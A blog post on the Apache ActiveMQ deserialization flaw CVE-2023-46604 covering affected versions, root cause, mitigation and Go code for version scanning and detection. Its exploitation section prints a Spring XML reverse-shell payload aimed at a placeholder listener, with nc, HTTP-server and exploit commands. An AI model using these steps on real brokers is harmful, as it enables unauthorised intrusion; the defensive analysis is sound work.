Apache ActiveMQ Under Siege: Understanding CVE-2023-46604

June 27, 2024

In the intricate landscape of cybersecurity, vulnerabilities often lurk in the shadows, waiting to be discovered and exploited. One such critical vulnerability that demands our attention is CVE-2023-46604, affecting the widely used Apache ActiveMQ messaging system.

At its core, CVE-2023-46604 is an unauthenticated remote code execution (RCE) vulnerability in Apache ActiveMQ's OpenWire protocol handler, reachable over the broker's OpenWire transport (TCP port 61616 by default). The root cause is unsafe deserialization rather than a missing input filter: the broker instantiates a class named inside an attacker-supplied OpenWire command without checking what that class is, which lets a remote attacker run arbitrary code on the broker host. The consequences are severe: unauthorized access, data exfiltration and full system compromise. The issue is rated critical and carries a CVSS v3.1 base score of 10.0 in the NVD.

What is Apache ActiveMQ?

ActiveMQ is an open source, multi-protocol, Java-based message broker maintained by the Apache Software Foundation. Its job is to route messages between applications, serving as the messaging backbone between distributed systems. Besides its native OpenWire protocol (the one this vulnerability lives in) it speaks STOMP, AMQP, MQTT and WebSocket transports, so clients written in different languages can share one broker. Message persistence, clustering and high-availability features keep messages deliverable across network failures or crashes, and its management and monitoring tools let administrators inspect queues and broker health in real time. In short, it is a dependable, feature-rich messaging platform for building resilient distributed applications, which is also why it is so widely deployed.

Affected versions:

  • Apache ActiveMQ 5.18.0 before 5.18.3
  • Apache ActiveMQ 5.17.0 before 5.17.6
  • Apache ActiveMQ 5.16.0 before 5.16.7
  • Apache ActiveMQ before 5.15.16
  • Apache ActiveMQ Legacy OpenWire Module 5.18.0 before 5.18.3
  • Apache ActiveMQ Legacy OpenWire Module 5.17.0 before 5.17.6
  • Apache ActiveMQ Legacy OpenWire Module 5.16.0 before 5.16.7
  • Apache ActiveMQ Legacy OpenWire Module 5.8.0 before 5.15.16
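Checking a broker against this list remotely, as an added example (Go; not code from this page, the linked exploit or the ActiveMQ project): an ActiveMQ broker sends an OpenWire WireFormatInfo frame as soon as a TCP client connects to the OpenWire port, and the property map inside it carries ProviderName and ProviderVersion. The program below reads that unsolicited hello without sending anything, decodes the property map and applies the version ranges listed above. The frame layout is reconstructed from ActiveMQ's loose-encoding marshallers; the 64 KiB frame cap, the 5-second timeout and the command-line handling are this example's own choices.

```go
package main

import (
	"encoding/binary"
	"fmt"
	"io"
	"net"
	"os"
	"time"
)

// ParseWireFormatInfo decodes a loosely encoded WireFormatInfo body (the bytes
// after the int32 size prefix): type byte 1, the 8-byte magic "ActiveMQ", the
// int32 OpenWire version, a boolean "properties present", an int32 byte length,
// then the property map as an int32 entry count followed by (UTF key, type tag,
// value) triples. Tags are MarshallingSupport's: 1 boolean, 5 int, 6 long, 9 string.
func ParseWireFormatInfo(body []byte) (props map[string]string, err error) {
	defer func() { // a short read panics on slice bounds; report it as an error
		if r := recover(); r != nil {
			props, err = nil, fmt.Errorf("truncated frame: %v", r)
		}
	}()
	rest := body[:len(body):len(body)] // cap == len, so any over-read panics
	next := func(n int) []byte { v := rest[:n]; rest = rest[n:]; return v }
	rd8 := func() byte { return next(1)[0] }
	rd32 := func() int32 { return int32(binary.BigEndian.Uint32(next(4))) }
	rdUTF := func() string { return string(next(int(binary.BigEndian.Uint16(next(2))))) } // Java writeUTF
	if rd8() != 1 || string(next(8)) != "ActiveMQ" {
		return nil, fmt.Errorf("not an OpenWire WireFormatInfo frame")
	}
	props = map[string]string{"OpenWireVersion": fmt.Sprint(rd32())}
	if rd8() == 0 {
		return props, nil // marshalledProperties == null
	}
	rd32() // byte length of the map; the entry count that follows is enough
	for n := rd32(); n > 0; n-- {
		switch key, tag := rdUTF(), rd8(); tag {
		case 1:
			props[key] = fmt.Sprint(rd8() != 0)
		case 5:
			props[key] = fmt.Sprint(rd32())
		case 6:
			props[key] = fmt.Sprint(int64(binary.BigEndian.Uint64(next(8))))
		case 9:
			props[key] = rdUTF()
		default:
			return nil, fmt.Errorf("unsupported property type %d for %q", tag, key)
		}
	}
	return props, nil
}

// IsVulnerable applies the advisory's ranges to a ProviderVersion such as
// "5.18.2". false means "not matched", which also covers unparseable and
// non-5.x strings, so treat it as "check by hand" rather than proof of safety.
func IsVulnerable(version string) bool {
	var major, minor, patch int
	if n, _ := fmt.Sscanf(version, "%d.%d.%d", &major, &minor, &patch); n != 3 || major != 5 {
		return false
	}
	if fix, ok := map[int]int{18: 3, 17: 6, 16: 7, 15: 16}[minor]; ok {
		return patch < fix // first fixed release of that line
	}
	return minor < 15 // 5.0 to 5.14 are all "before 5.15.16"; 5.19+ is not in the list
}

// FetchWireFormatInfo connects to an OpenWire listener (61616 by default) and
// returns the body of the size-prefixed hello the broker sends unprompted.
// Nothing is written to the socket, so this is a safe version check.
func FetchWireFormatInfo(addr string, timeout time.Duration) ([]byte, error) {
	conn, err := net.DialTimeout("tcp", addr, timeout)
	if err != nil {
		return nil, err
	}
	defer conn.Close()
	conn.SetDeadline(time.Now().Add(timeout))
	hdr := make([]byte, 4) // int32 frame size, then the body
	if _, err = io.ReadFull(conn, hdr); err != nil || binary.BigEndian.Uint32(hdr) > 1<<16 {
		return nil, fmt.Errorf("bad frame header % x: %v", hdr, err)
	}
	body := make([]byte, binary.BigEndian.Uint32(hdr))
	_, err = io.ReadFull(conn, body)
	return body, err
}

func main() { // usage: go run scan.go broker:61616
	body, err := FetchWireFormatInfo(os.Args[1], 5*time.Second)
	props, perr := ParseWireFormatInfo(body)
	if err != nil || perr != nil {
		fmt.Println("error:", err, perr)
		os.Exit(1)
	}
	v := props["ProviderVersion"]
	fmt.Printf("%s %s (OpenWire v%s): vulnerable=%v\n", props["ProviderName"], v, props["OpenWireVersion"], IsVulnerable(v))
}
```

A false result means the version string did not match one of the ranges above (including a version the scanner could not parse), so confirm by hand rather than treating it as proof of a patched broker. A broker that only exposes an ssl:// OpenWire transport will not yield a plaintext hello to a plain TCP connect.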

Technical Details of the CVE

The root cause of this vulnerability is insecure deserialization in the OpenWire protocol handler. Input arriving on the OpenWire port passes through unmarshalling, which turns the raw bytes of each wire frame back into the Java command object they represent; deserialization is one form of unmarshalling. (The same word is used in Java for turning XML into objects, as JAXB does, but here it refers to OpenWire's own binary format.)

Each OpenWire command type has a DataStreamMarshaller that knows how to read it, and the broker picks the marshaller from the data-structure-type byte at the start of the frame. ExceptionResponse (type 31) carries a throwable as two strings, a class name and a message. The ExceptionResponseMarshaller hands those to a createThrowable helper that resolves the class name with Class.forName, looks up the constructor taking a single String and invokes it with the message, without checking that the resolved class is actually a Throwable. Because the class name comes straight off the network, an attacker can name any class on the broker's classpath that has a public String constructor and have it instantiated with a string of their choosing. The fix adds exactly that missing check and rejects any class that is not assignable to Throwable.

ClassPathXmlApplicationContext is a Spring class that ActiveMQ ships on its classpath; Spring applications are normally configured by passing it the location of a bean-definition XML file at construction time. Its single-String constructor loads that file immediately, and the location may be an http:// URL. Naming this class in the ExceptionResponse and passing a URL as the "message" therefore makes the broker download an attacker-controlled XML file and instantiate the beans it defines, which is enough to run arbitrary commands (for example through java.lang.ProcessBuilder).

Most of the publicly available PoCs and exploits, including the Metasploit module for this CVE, use exactly this chain to execute code on the target or to obtain a reverse shell.

Exploitation

Once you have confirmed that the target's Apache ActiveMQ version falls within the affected ranges, you can use this publicly available exploit:
https://github.com/rootsecdev/CVE-2023-46604

Follow the below steps for successful exploitation:

  • Clone the repository and move into the directory.

git clone https://github.com/rootsecdev/CVE-2023-46604.git
cd CVE-2023-46604

  • Based on the target's OS, edit poc-linux.xml or poc-windows.xml accordingly and replace LISTENER-IP and LISTENER-PORT with your nc listener's IP and port:

<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="
 http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
        <list>
            <value>bash</value>
            <value>-c</value>
            <!-- Reverse shell back to the nc listener. The ">" and "&" of the bash redirection are HTML-entity encoded because they are special characters in XML. Set the IP and port to match the listener you start below. -->
            <value>bash -i &#x3E;&#x26; /dev/tcp/<LISTENER-IP>/<LISTENER-PORT> 0&#x3E;&#x26;1</value>
        </list>
        </constructor-arg>
    </bean>
</beans>

  • Now in a new terminal window change to the directory containing this XML file and start an HTTP server: python3 -m http.server
    This serves the directory on port 8000 by default; the broker will fetch the XML from it.
  • In another terminal window start a nc listener on the port you put in the XML: nc -lnvp 9999
  • Now run the exploit using the below mentioned command:

go run main.go -i <TARGET-IP> -p 61616 -u http://<ATTACKER-IP>:8000/poc-linux.xml

  • If everything goes well and the exploit runs successfully, you should get a shell in the nc listener's terminal window.

Mitigation

  • Upgrade ActiveMQ (and the Legacy OpenWire module, where deployed) to a patched release: 5.15.16, 5.16.7, 5.17.6 or 5.18.3, or later.
  • Restrict network access to the OpenWire port (61616 by default) to authorized clients only; the exploit needs no credentials, so network reachability is the whole attack surface.
  • Use firewalls and intrusion detection, and hunt for indicators of compromise: ExceptionResponse frames sent by clients that name Spring XmlApplicationContext classes, the broker's Java process fetching XML files over HTTP, and unexpected child processes spawned by it.
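To make the chain described under Technical Details concrete, and to give the indicator hunt in the last bullet something to run, here is an added example (Go; not code from this page, the linked exploit or the ActiveMQ project). It builds the ExceptionResponse frame the exploit sends, parses it back the way the broker's loose unmarshaller reads it, and applies a detection heuristic to the decoded command. The frame layout follows ActiveMQ's loose-encoding marshallers for ExceptionResponse; the host 192.0.2.10, the benign sample and the heuristic itself are this example's own constructions.

```go
package main

import (
	"encoding/binary"
	"fmt"
	"strings"
)

// ExceptionResponse holds what the vulnerable marshaller feeds to
// createThrowable(className, message): Class.forName(className), then
// its (String) constructor invoked with message, with no Throwable check.
type ExceptionResponse struct {
	CommandID, CorrelationID int32
	ClassName, Message       string
}

func utf(s string) []byte { return append([]byte{byte(len(s) >> 8), byte(len(s))}, s...) }
func i32(v int32) []byte  { return []byte{byte(v >> 24), byte(v >> 16), byte(v >> 8), byte(v)} }

// Encode emits the loosely encoded frame: int32 size, type byte 31
// (EXCEPTION_RESPONSE), int32 commandId, boolean responseRequired (0 here),
// int32 correlationId, boolean "exception present", then boolean + UTF class
// name and boolean + UTF message. A fresh connection uses loose encoding until
// wire-format negotiation, so this can be the very first frame sent.
func (e ExceptionResponse) Encode() []byte {
	b := append([]byte{31}, i32(e.CommandID)...)
	b = append(append(b, 0), i32(e.CorrelationID)...)
	b = append(append(b, 1, 1), utf(e.ClassName)...)
	b = append(append(b, 1), utf(e.Message)...)
	return append(i32(int32(len(b))), b...)
}

// Decode parses a size-prefixed frame: nil for other command types, an error
// for truncated or mis-sized input. A stack trace after the message is left
// unread (one is only sent once StackTraceEnabled has been negotiated).
func Decode(frame []byte) (e *ExceptionResponse, err error) {
	defer func() { // a short read panics on slice bounds; report it as an error
		if r := recover(); r != nil {
			e, err = nil, fmt.Errorf("truncated frame: %v", r)
		}
	}()
	rest := frame[:len(frame):len(frame)] // cap == len, so any over-read panics
	next := func(n int) []byte { v := rest[:n]; rest = rest[n:]; return v }
	rd8 := func() byte { return next(1)[0] }
	rd32 := func() int32 { return int32(binary.BigEndian.Uint32(next(4))) }
	rdUTF := func() string { return string(next(int(binary.BigEndian.Uint16(next(2))))) }
	if size := rd32(); int(size) != len(rest) {
		return nil, fmt.Errorf("size prefix %d does not match %d body bytes", size, len(rest))
	}
	if rd8() != 31 {
		return nil, nil
	}
	e = &ExceptionResponse{CommandID: rd32()}
	rd8() // responseRequired
	e.CorrelationID = rd32()
	if rd8() != 0 { // exception present; each string is boolean "non-null" + UTF
		if rd8() != 0 {
			e.ClassName = rdUTF()
		}
		if rd8() != 0 {
			e.Message = rdUTF()
		}
	}
	return e, nil
}

// Suspicious is a sensor-side heuristic for frames sent TO the broker port (a
// client has little reason to send ExceptionResponse at all). The fix rejects
// classes not assignable to Throwable; a sensor cannot resolve Java classes, so
// it flags the Spring gadget the PoCs use, URL-shaped messages and odd names.
func Suspicious(e *ExceptionResponse) (bool, string) {
	if e == nil || e.ClassName == "" {
		return false, ""
	}
	if strings.Contains(e.ClassName, "XmlApplicationContext") {
		return true, "Spring XML context class: " + e.ClassName
	}
	if m := strings.ToLower(e.Message); strings.HasPrefix(m, "http://") || strings.HasPrefix(m, "https://") || strings.HasPrefix(m, "file:") {
		return true, "URL where an exception message should be: " + e.Message
	}
	if n := e.ClassName; !strings.HasSuffix(n, "Exception") && !strings.HasSuffix(n, "Error") && !strings.HasSuffix(n, "Throwable") {
		return true, "class name is not an exception type: " + n
	}
	return false, ""
}

func main() {
	// Constructed samples, not captures: the exploit frame (documentation-range host) and a benign auth failure.
	attack := ExceptionResponse{CorrelationID: 1, Message: "http://192.0.2.10:8000/poc-linux.xml",
		ClassName: "org.springframework.context.support.ClassPathXmlApplicationContext"}
	benign := ExceptionResponse{CommandID: 7, CorrelationID: 3, ClassName: "java.lang.SecurityException",
		Message: "User name [admin] or password is invalid."}
	for _, f := range [][]byte{attack.Encode(), benign.Encode()} {
		e, err := Decode(f)
		bad, why := Suspicious(e) // tolerates the nil from a decode error
		fmt.Printf("%d bytes err=%v suspicious=%v %s\n", len(f), err, bad, why)
	}
}
```

The heuristic is deliberately broader than the one class the exploit uses: the patched broker's check is "is this class a Throwable", which a network sensor cannot answer, so it flags anything that does not look like an exception type and any message that looks like a configuration location. Tune the suffix list against your own traffic before alerting on it; direction (client to broker) is the strongest single signal.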

References